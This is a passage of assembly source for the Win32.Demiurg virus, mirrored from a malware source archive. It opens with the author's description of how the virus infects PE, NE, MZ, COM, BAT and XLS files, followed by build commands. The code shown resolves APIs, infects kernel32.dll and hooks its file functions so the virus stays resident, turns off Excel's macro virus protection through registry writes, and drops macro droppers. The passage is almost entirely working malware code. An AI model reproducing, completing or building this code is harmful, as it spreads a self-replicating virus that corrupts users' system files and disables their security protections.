mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
3634 lines
147 KiB
NASM
3634 lines
147 KiB
NASM
|
|
|||
|
; *************************************************************************
|
|||
|
; ******************** ********************
|
|||
|
; ******************** Win32.Demiurg ********************
|
|||
|
; ******************** by ********************
|
|||
|
; ******************** Black Jack ********************
|
|||
|
; ******************** ********************
|
|||
|
; *************************************************************************
|
|||
|
|
|||
|
comment ~
|
|||
|
|
|||
|
NAME: Win32.Demiurg
|
|||
|
AUTHOR: Black Jack [independant Austrian Win32asm virus coder]
|
|||
|
CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
|
|||
|
TYPE: Win32 global resident (in kernel32.dll) PE/NE/MZ/COM/BAT/XLS infector
|
|||
|
SIZE: 16354 bytes
|
|||
|
|
|||
|
DESCRIPTION:
|
|||
|
The main instance of the virus is in infected PE EXE files (or the PE
|
|||
|
dropper). If such a file is executed, the first thing the virus does is
|
|||
|
getting the needed API addresses by standart methods (first it scans the
|
|||
|
hosts import table for the GetModuleHandleA API and uses it to get the
|
|||
|
KERNEL32 handle if found, if not, it gets it by the "scan down from the
|
|||
|
value from the top of stack"-trick, then the export table of KERNEL32 is
|
|||
|
scanned for all needed APIs, finally also ADVAPI32.dll is loaded and some
|
|||
|
APIs for registry operations fetched from there). Then the virus performs
|
|||
|
two tasks before returning to the host: first infected KERNEL32.dll, then
|
|||
|
infected MS-Excel.
|
|||
|
|
|||
|
To infect KERNEL32.dll, it is copied from the system directory to the windows
|
|||
|
directory and infected there. The infection process is the same as with
|
|||
|
regular PE EXE files (see later), but not the main entry point is modified,
|
|||
|
but some file modification APIs are hooked (to maintain compatiblity to WinNT
|
|||
|
in both their ANSI and unicode versions). To replace the old KERNEL32.dll
|
|||
|
with the infected copy, the virus uses the MoveFileExA API with the
|
|||
|
MOVEFILE_DELAY_UNTIL_REBOOT flag; this will only work in WinNT, but this
|
|||
|
doesn't matter, because Win9x will use the copy in the windows directory
|
|||
|
rather than the one in the system directory after the next reboot anyways.
|
|||
|
|
|||
|
To infect Excel, the virus checks the registry if a supported version (97 or
|
|||
|
2000) is installed; if so, it turns the macro virus protection off and gets
|
|||
|
the path where it is installed. Then it drops a .xls file with a little macro
|
|||
|
as \xlstart\demiurg.xls; this file will be loaded automatically at the next
|
|||
|
start of excel, and the macro executed. Besides that, another macro source
|
|||
|
code is generated as C:\demiurg.sys file, that contains VBA instructions to
|
|||
|
write the virus PE dropper to C:\demiurg.exe and execute it. Please note that
|
|||
|
this macro uses 100% VBA instructions (the binary data is stored in Arrays),
|
|||
|
no stupid debug scripts. This file will be used to infect regular .xls files
|
|||
|
with. This means that the VBA instance of the virus is not a "full" macro
|
|||
|
virus, because it is not able to replicate from one .xls file to another
|
|||
|
directly.
|
|||
|
|
|||
|
After the KERNEL32.dll infection, the virus will stay resident after the next
|
|||
|
reboot. It then catches most file API functions and infects COM, EXE (MZ, NE,
|
|||
|
PE) and BAT files as they are accessed.
|
|||
|
|
|||
|
The PE EXE infection process is quite standart: The last section is increased,
|
|||
|
and the virus body is appended after the virtual end of the section. In my
|
|||
|
opinion this is much more logical than appending after the physical end, how
|
|||
|
it is done in most Win32 virii nowadays, because otherwise the virus body can
|
|||
|
be overwritten by host data (if the last section is the .bss section, for
|
|||
|
example). Besides that the virtual size is not aligned (although some
|
|||
|
compilers/assemblers like TASM align it to SectionAlign, this is not
|
|||
|
necessary), while the physical size is always aligned to FileAlign; this
|
|||
|
means we can save some space in some cases. Then the entry point is set to
|
|||
|
the virus body (in case of PE EXE files) and finally also the imagesize and
|
|||
|
the checksum (in case it was different to zero before infection) are updated
|
|||
|
to maintain compatiblity to WinNT; to recalculate the CRC the
|
|||
|
CheckSumMappedFile API from IMAGEHLP.dll is used.
|
|||
|
|
|||
|
All other infectable files are only infected "indirectly": A small piece of
|
|||
|
code is added that drops a PE dropper and infects it. Because of that the
|
|||
|
virus can only replicate in Win32 enviroments, although it infects a lot of
|
|||
|
different filetypes.
|
|||
|
|
|||
|
DOS EXE files are also infected in standart manner: some code is appended at
|
|||
|
the end of file, then the entrypoint and the stack are set to it, and the
|
|||
|
internal filesize is recalculated. Sligtly interesting is that the virus is
|
|||
|
able to infect files with internal overlays that were generated with borland
|
|||
|
compilers, in this case the virus is appended between the internal end of the
|
|||
|
file and the overlay, after the overlay has been shifted back. This works
|
|||
|
very fine (to my own surprise); try to infect TD.EXE for example.
|
|||
|
|
|||
|
COM files are infected by internally converting them to EXE files by
|
|||
|
prepending a small EXE header, and then infected just like a DOS EXE file.
|
|||
|
Of course the virus is also able to deal with ENUNS files, in this case the
|
|||
|
ENUNS signature is threated just like an internal overlay.
|
|||
|
|
|||
|
BAT files are infected by adding some BAT code at the end of the file, then
|
|||
|
the the character 1Ah (end of text file; BAT files will be only executed
|
|||
|
until this character is reached), and after that the PE dropper. The BAT code
|
|||
|
works by ECHOing out a small COM file (which was been written in such a
|
|||
|
careful way that it only contains characters that are legit in BAT files) to
|
|||
|
C:\DEMIURG.EXE. Then this file is executed with the name of the BAT file as
|
|||
|
parameter. Then the COM file reads the PE dropper from the end of the BAT
|
|||
|
file and writes it to C:\DEMIURG.EXE too, and then executes the new file.
|
|||
|
|
|||
|
NE files are infected with the method that was introduced by Mark Ludwig (I
|
|||
|
think): The code segment that contains the entry point is increased, the rest
|
|||
|
of the file is shifted back and the NE header tables are fixed to reflect the
|
|||
|
new layout of the file. Then a small piece of code is injected into the newly
|
|||
|
gained room and the entrypoint set to it; besides that the PE dropper is
|
|||
|
appended at the end of the file as internal overlay.
|
|||
|
|
|||
|
|
|||
|
ASSEMBLE WITH:
|
|||
|
tasm32 /mx /m demiurg.asm
|
|||
|
tlink32 /Tpe /aa demiurg.obj,,, import32.lib
|
|||
|
|
|||
|
there's no need for PEWRSEC or a similar tool, because the
|
|||
|
virus code is stored in the data section.
|
|||
|
|
|||
|
DISCLAIMER: I do *NOT* support the spreading of viruses in the wild.
|
|||
|
Therefore, this source was only written for research and
|
|||
|
education. Please do not spread it. The author can't be hold
|
|||
|
responsible for what you decide to do with this source.
|
|||
|
|
|||
|
~
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
workspace EQU 100000
|
|||
|
virus_size EQU (virus_end-start)
|
|||
|
|
|||
|
Extrn ExitProcess:Proc
|
|||
|
Extrn MessageBoxA:Proc
|
|||
|
|
|||
|
.386
|
|||
|
.model flat
|
|||
|
.data
|
|||
|
start:
|
|||
|
db 68h ; push imm32
|
|||
|
orig_eip dd offset dummy_host ; push host entry point
|
|||
|
|
|||
|
pushfd ; save flags
|
|||
|
pushad ; save all registers
|
|||
|
|
|||
|
call delta ; get delta offset
|
|||
|
delta:
|
|||
|
pop ebp
|
|||
|
sub ebp, offset delta
|
|||
|
|
|||
|
; ----- GET KERNEL32 IMAGE BASE ---------------------------------------------
|
|||
|
db 0B8h ; mov eax, imm32
|
|||
|
imagebase dd 400000h ; EAX=imagebase of host
|
|||
|
|
|||
|
mov ebx, [eax+3Ch] ; EBX=new exe pointer RVA
|
|||
|
add ebx, eax ; EBX=new exe pointer VA
|
|||
|
mov ebx, [ebx+128] ; EBX=import directory RVA
|
|||
|
add ebx, eax ; EBX=import directory VA
|
|||
|
|
|||
|
search_kernel32_descriptor:
|
|||
|
mov esi, [ebx+12] ; ESI=name of library RVA
|
|||
|
or esi, esi ; last import descriptor ?
|
|||
|
JZ failed ; if yes, we failed
|
|||
|
add esi, eax ; ESI=name of library VA
|
|||
|
lea edi, [ebp+offset kernel32name] ; EDI=name of kernel32 VA
|
|||
|
mov ecx, 8 ; ECX=length to compare
|
|||
|
cld ; clear direction flag
|
|||
|
rep cmpsb ; compare the two strings
|
|||
|
JE found_kernel32_descriptor ; if equal, we found it
|
|||
|
|
|||
|
add ebx, 20 ; next import descriptor
|
|||
|
JMP search_kernel32_descriptor ; search on
|
|||
|
|
|||
|
found_kernel32_descriptor:
|
|||
|
xor edx, edx ; EDX=0 - our counter
|
|||
|
push dword ptr [ebx+16] ; RVA of array of API RVAs
|
|||
|
mov ebx, [ebx] ; EBX=array of API name ptrs
|
|||
|
or ebx, ebx ; are there APIs imported ?
|
|||
|
JZ pop_failed ; if not, we failed
|
|||
|
add ebx, eax ; EBX=RVA API name ptrs array
|
|||
|
|
|||
|
search_GetModuleHandle:
|
|||
|
mov esi, [ebx] ; ESI=RVA of a API name
|
|||
|
or esi, esi ; searched all API names?
|
|||
|
JZ pop_failed ; if yes, we failed
|
|||
|
test esi, 80000000h ; is it an ordinal ?
|
|||
|
JNZ next_API ; can't handle ordinal imports
|
|||
|
add esi, eax ; ESI=VA of API name
|
|||
|
inc esi ; skip the ordinal hint
|
|||
|
inc esi
|
|||
|
lea edi, [ebp+offset GetModuleHandleA] ; EDI=VA of GetModuleHandleA
|
|||
|
mov ecx, l_GMH ; ECX=length GetModuleHandleA
|
|||
|
cld ; clear direction flag
|
|||
|
rep cmpsb ; compare the two strings
|
|||
|
JE found_GetModuleHandle
|
|||
|
|
|||
|
next_API:
|
|||
|
inc edx ; increment our API counter
|
|||
|
inc ebx ; EBX=ptr to next API name ptr
|
|||
|
inc ebx
|
|||
|
inc ebx
|
|||
|
inc ebx
|
|||
|
JMP search_GetModuleHandle ; try next API name
|
|||
|
|
|||
|
found_GetModuleHandle:
|
|||
|
pop ebx ; EBX=RVA of array of API RVAs
|
|||
|
add ebx, eax ; EBX=VA of array of API RVAs
|
|||
|
mov ebx, [ebx+edx*4] ; EBX=GetModuleHandleA entry
|
|||
|
|
|||
|
lea edx, [ebp+offset kernel32name] ; EDX=pointer to KERNEL32.dll
|
|||
|
push edx ; push it
|
|||
|
call ebx ; call GetModuleHandleA
|
|||
|
or eax, eax ; got kernel32 handle/base ?
|
|||
|
JNZ found_kernel32 ; if yes, we got it!
|
|||
|
JMP failed ; otherwise, try other method
|
|||
|
|
|||
|
pop_failed:
|
|||
|
pop ebx ; remove shit from stack
|
|||
|
|
|||
|
failed: ; import method failed? then
|
|||
|
; try memory scanning method
|
|||
|
|
|||
|
mov ebx, [esp+10*4] ; EBX=address inside kernel32
|
|||
|
kernel32find:
|
|||
|
cmp dword ptr [ebx], "EP" ; found a PE header?
|
|||
|
JNE search_on_kernel32 ; if not, search on
|
|||
|
mov eax, [ebx+34h] ; EAX=module base address
|
|||
|
or al, al ; is it on a page start?
|
|||
|
JNZ search_on_kernel32 ; if not, search on
|
|||
|
cmp word ptr [eax], "ZM" ; is there a MZ header?
|
|||
|
JE found_kernel32 ; if yes, we found kernel32!
|
|||
|
search_on_kernel32:
|
|||
|
dec ebx ; go one byte down
|
|||
|
JMP kernel32find ; and search on
|
|||
|
found_kernel32:
|
|||
|
mov [ebp+offset kernel32], eax ; saver kernel32 base address
|
|||
|
|
|||
|
|
|||
|
lea esi, [ebp+offset kernel32_API_names_table] ; get APIs from
|
|||
|
lea edi, [ebp+offset kernel32_API_address_table]; KERNEL32.dll
|
|||
|
mov ecx, number_of_kernel32_APIs
|
|||
|
call GetAPIs
|
|||
|
|
|||
|
lea eax, [ebp+offset advapi32_dll] ; load ADVAPI32.dll
|
|||
|
push eax
|
|||
|
call [ebp+offset LoadLibraryA]
|
|||
|
|
|||
|
lea esi, [ebp+offset advapi32_API_names_table] ; get APIs from
|
|||
|
lea edi, [ebp+offset advapi32_API_address_table]; ADVAPI32.dll
|
|||
|
mov ecx, number_of_advapi32_APIs
|
|||
|
call GetAPIs
|
|||
|
|
|||
|
|
|||
|
call infect_kernel32
|
|||
|
call infect_excel
|
|||
|
|
|||
|
popad ; restore registers
|
|||
|
popfd
|
|||
|
ret ; return to host
|
|||
|
|
|||
|
; ----- END MAIN ROUTINE OF THE VIRUS ---------------------------------------
|
|||
|
|
|||
|
copyright db "[The Demiurg] - a Win32 virus by Black Jack", 0
|
|||
|
db "written in Austria in the year 2000", 0
|
|||
|
|
|||
|
; ----- INFECT KERNEL32.DLL -------------------------------------------------
|
|||
|
infect_kernel32:
|
|||
|
mov eax, [ebp+SetFileAttributesA] ; if we're already resident,
|
|||
|
sub eax, [ebp+GetFileAttributesA] ; we know the difference
|
|||
|
cmp eax, 2*API_hook_size ; between the two API entries:
|
|||
|
JE kernel32_infect_failure ; so don't reinfect kernel32.
|
|||
|
|
|||
|
push 260
|
|||
|
lea eax, [ebp+offset path_buffer1]
|
|||
|
push eax
|
|||
|
call [ebp+offset GetSystemDirectoryA] ; get the Windows System dir
|
|||
|
|
|||
|
lea eax, [ebp+offset kernel32_dll] ; add \kernel32.dll to string
|
|||
|
push eax
|
|||
|
lea eax, [ebp+offset path_buffer1]
|
|||
|
push eax
|
|||
|
call [ebp+offset lstrcatA]
|
|||
|
|
|||
|
push 260 ; get the Windows directory
|
|||
|
lea eax, [ebp+offset path_buffer2]
|
|||
|
push eax
|
|||
|
call [ebp+offset GetWindowsDirectoryA]
|
|||
|
|
|||
|
lea eax, [ebp+offset kernel32_dll] ; add \kernel32.dll to string
|
|||
|
push eax
|
|||
|
lea eax, [ebp+offset path_buffer2]
|
|||
|
push eax
|
|||
|
call [ebp+offset lstrcatA]
|
|||
|
|
|||
|
push 1 ; don't overwrite target
|
|||
|
lea eax, [ebp+offset path_buffer2] ; target
|
|||
|
push eax
|
|||
|
lea eax, [ebp+offset path_buffer1] ; source
|
|||
|
push eax
|
|||
|
call [ebp+offset CopyFileA] ; copy kernel32.dll from
|
|||
|
; system to windows directory
|
|||
|
or eax, eax
|
|||
|
JZ kernel32_infect_failure
|
|||
|
|
|||
|
lea edx, [ebp+offset path_buffer2] ; open and map the KERNEL32.dll
|
|||
|
call openfile ; in the windows directory
|
|||
|
mov ebx, eax
|
|||
|
add ebx, [eax+3Ch] ; EBX=kernel32 PE header
|
|||
|
|
|||
|
push ebx ; save the PE header offset
|
|||
|
call append_PE ; infect KERNEL32.dll
|
|||
|
pop ebx ; EBX=Kernel32 PE header
|
|||
|
|
|||
|
mov ecx, number_of_hooked_APIs ; ECX=number of APIs to hook
|
|||
|
lea esi, [ebp+offset hooked_API_names_table] ; ESI=names of APIs
|
|||
|
mov edi, (API_hooks - start) ; EDI=first API hook relative
|
|||
|
; to virus start
|
|||
|
|
|||
|
hook_APIs_loop:
|
|||
|
call hook_API ; hook this API
|
|||
|
|
|||
|
mov eax, esi ; EAX=API name address
|
|||
|
|
|||
|
next_hook_API_loop:
|
|||
|
inc eax ; search end of string
|
|||
|
cmp byte ptr [eax+1], 0
|
|||
|
JNE next_hook_API_loop
|
|||
|
|
|||
|
cmp byte ptr [eax], "A" ; ANSI version of API?
|
|||
|
JNE next_API_name
|
|||
|
|
|||
|
mov byte ptr [eax], "W" ; hook also unicode version
|
|||
|
push eax
|
|||
|
call hook_API
|
|||
|
pop eax
|
|||
|
mov byte ptr [eax], "A" ; restore ANSI version name
|
|||
|
|
|||
|
next_API_name:
|
|||
|
inc eax ; EAX=next API name
|
|||
|
inc eax
|
|||
|
xchg esi, eax ; ESI=next API name
|
|||
|
|
|||
|
LOOP hook_APIs_loop ; hook next API
|
|||
|
|
|||
|
finish_kernel32_infection:
|
|||
|
|
|||
|
mov dword ptr [ebx+8], 666 ; destroy kernel32 build time
|
|||
|
|
|||
|
call finish_PE_infection ; append virus body and
|
|||
|
; recalculate checksum
|
|||
|
|
|||
|
call closemap ; close map and file
|
|||
|
|
|||
|
push 5 ; flags for MoveFileExA
|
|||
|
; MOVEFILE_REPLACE_EXISTING +
|
|||
|
; MOVEFILE_DELAY_UNTIL_REBOOT
|
|||
|
lea eax, [ebp+offset path_buffer1] ; target
|
|||
|
push eax
|
|||
|
lea eax, [ebp+offset path_buffer2] ; source
|
|||
|
push eax
|
|||
|
call [ebp+offset MoveFileExA] ; NOTE: This API call will
|
|||
|
; only work in WinNT. But this
|
|||
|
; is no problem, because Win9X
|
|||
|
; will prefer the kernel32.dll
|
|||
|
; in the Windows directory to
|
|||
|
; the one in the System
|
|||
|
; directory anyways.
|
|||
|
kernel32_infect_failure:
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- HOOK ONE API --------------------------------------------------------
|
|||
|
|
|||
|
hook_API:
|
|||
|
push ebx ; save registers
|
|||
|
push ecx
|
|||
|
push esi
|
|||
|
|
|||
|
push ebx ; save EBX (PE hdr in memmap)
|
|||
|
push edi ; save EDI (hook "RVA")
|
|||
|
|
|||
|
mov eax, [ebp+offset kernel32] ; EAX=KERNEL32 base address
|
|||
|
call My_GetProcAddress
|
|||
|
; EDX=RVA of RVA of API in
|
|||
|
; export table
|
|||
|
mov ecx, [edx+eax] ; ECX=API RVA
|
|||
|
add ecx, eax ; ECX=API VA
|
|||
|
|
|||
|
pop edi ; EDI="RVA" of API hook
|
|||
|
pop ebx ; EBX=K32 PE header in memmap
|
|||
|
mov [edi+ebp+offset start+1], ecx ; store original API VA
|
|||
|
|
|||
|
movzx ecx, word ptr [ebx+6] ; ECX=number of sections
|
|||
|
movzx eax, word ptr [ebx+14h] ; size of optional header
|
|||
|
lea ebx, [eax+ebx+18h] ; EBX=first section header
|
|||
|
; 18h = size of file header
|
|||
|
|
|||
|
search_section:
|
|||
|
mov esi, [ebx+0Ch] ; ESI=section RVA
|
|||
|
cmp esi, edx
|
|||
|
JA next_section
|
|||
|
add esi, [ebx+8] ; add section virtual size
|
|||
|
cmp esi, edx
|
|||
|
JA found_section
|
|||
|
next_section:
|
|||
|
add ebx, 40 ; 40 = section header size
|
|||
|
LOOP search_section
|
|||
|
|
|||
|
section_not_found:
|
|||
|
JMP exit_hook_API
|
|||
|
|
|||
|
found_section:
|
|||
|
sub edx, [ebx+0Ch] ; section RVA
|
|||
|
add edx, [ebx+14h] ; start of raw data
|
|||
|
; EDX=physical offset of
|
|||
|
; API RVA in K32 export table
|
|||
|
add edx, [ebp+offset mapbase] ; EDX=address in memmap
|
|||
|
|
|||
|
mov eax, edi
|
|||
|
add eax, [ebp+offset virus_RVA] ; EAX=API hook RVA in K32
|
|||
|
mov [edx], eax ; hook API
|
|||
|
|
|||
|
exit_hook_API:
|
|||
|
add edi, API_hook_size ; EDI=next API hook
|
|||
|
pop esi
|
|||
|
pop ecx
|
|||
|
pop ebx
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- HOOKS FOR APIs ------------------------------------------------------
|
|||
|
|
|||
|
API_hooks:
|
|||
|
|
|||
|
CreateFileA_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookA
|
|||
|
|
|||
|
API_hook_size EQU ($ - offset CreateFileA_hook)
|
|||
|
|
|||
|
CreateFileW_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookW
|
|||
|
|
|||
|
GetFileAttributesA_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookA
|
|||
|
|
|||
|
GetFileAttributesW_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookW
|
|||
|
|
|||
|
SetFileAttributesA_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookA
|
|||
|
|
|||
|
SetFileAttributesW_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookW
|
|||
|
|
|||
|
CopyFileA_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookA
|
|||
|
|
|||
|
CopyFileW_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookW
|
|||
|
|
|||
|
MoveFileExA_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookA
|
|||
|
|
|||
|
MoveFileExW_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookW
|
|||
|
|
|||
|
MoveFileA_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookA
|
|||
|
|
|||
|
MoveFileW_hook:
|
|||
|
push 12345678h
|
|||
|
JMP hookW
|
|||
|
|
|||
|
_lopen_hook:
|
|||
|
push 12345678h
|
|||
|
|
|||
|
|
|||
|
hookA:
|
|||
|
pushf
|
|||
|
pusha
|
|||
|
call hookA_next
|
|||
|
hookA_next:
|
|||
|
pop ebp
|
|||
|
sub ebp, offset hookA_next
|
|||
|
|
|||
|
mov edi, [esp+11*4]
|
|||
|
call infect
|
|||
|
popa
|
|||
|
popf
|
|||
|
RET
|
|||
|
|
|||
|
hookW:
|
|||
|
pushf
|
|||
|
pusha
|
|||
|
|
|||
|
call hookW_next
|
|||
|
hookW_next:
|
|||
|
pop ebp
|
|||
|
sub ebp, offset hookW_next
|
|||
|
|
|||
|
mov esi, [esp+11*4]
|
|||
|
lea edi, [ebp+offset path_buffer1]
|
|||
|
push edi
|
|||
|
|
|||
|
push 0 ; useless default character
|
|||
|
push 0 ; useless default character
|
|||
|
push 260 ; length of destination buffer
|
|||
|
push edi ; offset of destination buffer
|
|||
|
push -1 ; find length automatically
|
|||
|
push esi ; address of source buffer
|
|||
|
push 0 ; no special flags
|
|||
|
push 0 ; codepage: CP_ACP (ANSI)
|
|||
|
call dword ptr [ebp+WideCharToMultiByte]
|
|||
|
or eax, eax
|
|||
|
JZ WideCharToMultiByte_failed
|
|||
|
|
|||
|
pop edi
|
|||
|
call infect
|
|||
|
|
|||
|
WideCharToMultiByte_failed:
|
|||
|
popa
|
|||
|
popf
|
|||
|
RET
|
|||
|
|
|||
|
|
|||
|
; ----- INFECT EXCEL --------------------------------------------------------
|
|||
|
infect_excel:
|
|||
|
|
|||
|
mov [ebp+office_version_number], "8" ; first try Excel97 (v8.0)
|
|||
|
|
|||
|
try_excel:
|
|||
|
; Open the RegKey with the
|
|||
|
; MS-Excel Options
|
|||
|
lea eax, [ebp+offset reg_handle1] ; offset registry handle
|
|||
|
push eax
|
|||
|
push 2 ; access: KEY_SET_VALUE
|
|||
|
push 0 ; reserved
|
|||
|
lea eax, [ebp+offset regkey] ; which regkey
|
|||
|
push eax
|
|||
|
push 80000001h ; HKEY_CURRENT_USER
|
|||
|
call [ebp+offset RegOpenKeyExA]
|
|||
|
or eax, eax ; success=>EAX=0
|
|||
|
JZ found_excel
|
|||
|
|
|||
|
cmp [ebp+office_version_number], "9" ; already tried both versions?
|
|||
|
JE failure ; no excel found, we failed
|
|||
|
|
|||
|
inc [ebp+office_version_number] ; try also Excel2000
|
|||
|
JMP try_excel
|
|||
|
|
|||
|
|
|||
|
found_excel:
|
|||
|
cmp [ebp+office_version_number], "9" ; which version found ?
|
|||
|
JE unprotect_Excel2K
|
|||
|
|
|||
|
unprotect_Excel97:
|
|||
|
lea eax, [ebp+offset reg_handle2] ; offset registry handle
|
|||
|
push eax
|
|||
|
push 2 ; access: KEY_SET_VALUE
|
|||
|
push 0 ; reserved
|
|||
|
lea eax, [ebp+offset subkey_97] ; which regkey
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+offset reg_handle1] ; registry handle
|
|||
|
call [ebp+offset RegOpenKeyExA]
|
|||
|
or eax, eax ; success=>EAX=0
|
|||
|
JNZ failure
|
|||
|
|
|||
|
mov dword ptr [ebp+offset regvalue_dword], 0 ; 0 means Macro virus
|
|||
|
; protection off
|
|||
|
lea edx, [ebp+offset regvalue_options] ; offset value name
|
|||
|
JMP general_unprotect
|
|||
|
|
|||
|
unprotect_Excel2K:
|
|||
|
lea eax, [ebp+offset regvalue_dword] ; disposition (uninteresting)
|
|||
|
push eax
|
|||
|
lea eax, [ebp+offset reg_handle2] ; offset registry handle
|
|||
|
push eax
|
|||
|
push 0 ; security attributes
|
|||
|
push 6 ; access: KEY_SET_VALUE and
|
|||
|
; KEY_CREATE_SUB_KEY
|
|||
|
push 0 ; REG_OPTION_NON_VOLATILE
|
|||
|
push 0 ; address of class string
|
|||
|
push 0 ; reserved
|
|||
|
lea eax, [ebp+offset subkey_2K] ; which regkey
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+offset reg_handle1] ; registry handle
|
|||
|
call [ebp+RegCreateKeyExA]
|
|||
|
or eax, eax
|
|||
|
JNZ failure
|
|||
|
|
|||
|
mov dword ptr [ebp+offset regvalue_dword], 1 ; 1 - lowest level of
|
|||
|
; macro security
|
|||
|
lea edx, [ebp+offset regvalue_2K] ; offset value name
|
|||
|
|
|||
|
general_unprotect:
|
|||
|
; Now disable the MS-Excel
|
|||
|
; macro virus protection.
|
|||
|
push 4 ; size of buffer
|
|||
|
lea eax, [ebp+offset regvalue_dword] ; address of buffer
|
|||
|
push eax
|
|||
|
push 4 ; REG_DWORD
|
|||
|
push 0 ; reserved
|
|||
|
push edx ; offset value name
|
|||
|
push [ebp+reg_handle2] ; reg handle
|
|||
|
call [ebp+offset RegSetValueExA]
|
|||
|
or eax, eax
|
|||
|
JNZ failure
|
|||
|
|
|||
|
push [ebp+reg_handle2] ; Close the RegKey again
|
|||
|
call [ebp+offset RegCloseKey]
|
|||
|
or eax, eax
|
|||
|
JNZ failure
|
|||
|
|
|||
|
push [ebp+reg_handle1] ; Close the RegKey again
|
|||
|
call [ebp+offset RegCloseKey]
|
|||
|
or eax, eax
|
|||
|
JNZ failure
|
|||
|
|
|||
|
; Open the RegKey where we
|
|||
|
; will find the path to Excel
|
|||
|
lea eax, [ebp+offset reg_handle1] ; offset registry handle
|
|||
|
push eax
|
|||
|
push 1 ; access: KEY_QUERY_VALUE
|
|||
|
push 0 ; reserved
|
|||
|
lea eax, [ebp+offset regkey] ; which regkey
|
|||
|
push eax
|
|||
|
push 80000002h ; HKEY_LOCAL_MACHINE
|
|||
|
call [ebp+offset RegOpenKeyExA]
|
|||
|
or eax, eax ; success=>EAX=0
|
|||
|
JNZ failure
|
|||
|
|
|||
|
lea eax, [ebp+offset reg_handle2] ; offset registry handle
|
|||
|
push eax
|
|||
|
push 1 ; access: KEY_QUERY_VALUE
|
|||
|
push 0 ; reserved
|
|||
|
lea eax, [ebp+offset subkey_InstallRoot]; which regkey
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+offset reg_handle1] ; reg handle
|
|||
|
call [ebp+offset RegOpenKeyExA]
|
|||
|
or eax, eax ; success=>EAX=0
|
|||
|
JNZ failure
|
|||
|
|
|||
|
; Get the path where MS-Excel
|
|||
|
; is installed
|
|||
|
lea eax, [ebp+offset size_buffer] ; address of data buffer size
|
|||
|
mov dword ptr [eax], 260 ; set size of data buffer
|
|||
|
push eax
|
|||
|
lea eax, [ebp+offset path_buffer1] ; address of data buffer
|
|||
|
push eax
|
|||
|
lea eax, [ebp+offset REG_SZ] ; address of buffer for value
|
|||
|
push eax ; type (ASCIIZ string)
|
|||
|
push 0 ; reserved
|
|||
|
lea eax, [ebp+offset regvalue_path] ; address of name of value
|
|||
|
push eax ; to query
|
|||
|
push [ebp+reg_handle2] ; handle of RegKey to query
|
|||
|
call [ebp+offset RegQueryValueExA]
|
|||
|
or eax, eax
|
|||
|
JNZ failure
|
|||
|
|
|||
|
push [ebp+reg_handle1] ; close the RegKey
|
|||
|
call [ebp+offset RegCloseKey]
|
|||
|
or eax, eax
|
|||
|
JNZ failure
|
|||
|
|
|||
|
push [ebp+reg_handle2] ; close the RegKey
|
|||
|
call [ebp+offset RegCloseKey]
|
|||
|
or eax, eax
|
|||
|
JNZ failure
|
|||
|
|
|||
|
|
|||
|
lea eax, [ebp+offset demiurg_xls] ; add "\xlstart\demiurg.xls"
|
|||
|
push eax ; (our macro dropper file)
|
|||
|
lea eax, [ebp+offset path_buffer1] ; to the Excel path
|
|||
|
push eax
|
|||
|
call [ebp+offset lstrcatA]
|
|||
|
|
|||
|
lea edx, [ebp+offset path_buffer1] ; create this file
|
|||
|
call createfile
|
|||
|
JC failure
|
|||
|
|
|||
|
lea esi, [ebp+offset macro_dropper] ; decompress our macro dropper
|
|||
|
mov edi, eax ; file to the filemap
|
|||
|
mov ebx, macro_dropper_size
|
|||
|
call decompress
|
|||
|
|
|||
|
mov dword ptr [ebp+filesize], 16384 ; filesize of macro dropper
|
|||
|
|
|||
|
call closemap ; close the macro dropper file
|
|||
|
|
|||
|
|
|||
|
push dropper_size ; allocate memory where we can
|
|||
|
push 0 ; create the PE virus dropper
|
|||
|
call [ebp+offset GlobalAlloc]
|
|||
|
or eax, eax
|
|||
|
JZ failure
|
|||
|
mov [ebp+heap_buffer], eax ; save memory base address
|
|||
|
|
|||
|
xchg edi, eax ; EDI=address of allocated mem
|
|||
|
call create_dropper
|
|||
|
|
|||
|
lea edx, [ebp+offset macro_filename] ; create the file for the
|
|||
|
call createfile ; macro dropper code source
|
|||
|
JC failure ; that will be used to infect
|
|||
|
; excel files
|
|||
|
|
|||
|
xchg edi, eax ; EDI=base of memmap
|
|||
|
lea esi, [ebp+offset main_macro_code] ; copy main VBA code to there
|
|||
|
mov ecx, main_macro_code_size
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov byte ptr [ebp+sub_name], "b" ; name of the first VBA sub
|
|||
|
|
|||
|
mov esi, [ebp+heap_buffer] ; ESI=PE dropper image in mem
|
|||
|
|
|||
|
mov ecx, (dropper_size / 128) ; ECX=number of a=Array(...)
|
|||
|
; lines that are left
|
|||
|
|
|||
|
|
|||
|
build_subs_loop:
|
|||
|
push esi ; save ESI
|
|||
|
|
|||
|
lea esi, [ebp+offset sub_header] ; copy "Sub b()"
|
|||
|
movsd ; move 9 bytes
|
|||
|
movsd
|
|||
|
movsb
|
|||
|
|
|||
|
pop esi ; restore ESI
|
|||
|
|
|||
|
mov eax, (((dropper_size / 128)+5)/6) ; number of lines in one sub
|
|||
|
cmp ecx, eax ; last sub?
|
|||
|
JB push_0 ; ECX=0 afterwards (no more
|
|||
|
; lines left)
|
|||
|
sub ecx, eax ; otherwise ECX=number of
|
|||
|
; lines left
|
|||
|
push ecx ; save it
|
|||
|
mov ecx, eax ; ECX=nr. of lines in one sub
|
|||
|
JMP build_lines_loop
|
|||
|
|
|||
|
push_0:
|
|||
|
push 0
|
|||
|
|
|||
|
build_lines_loop:
|
|||
|
push ecx ; save number of lines left
|
|||
|
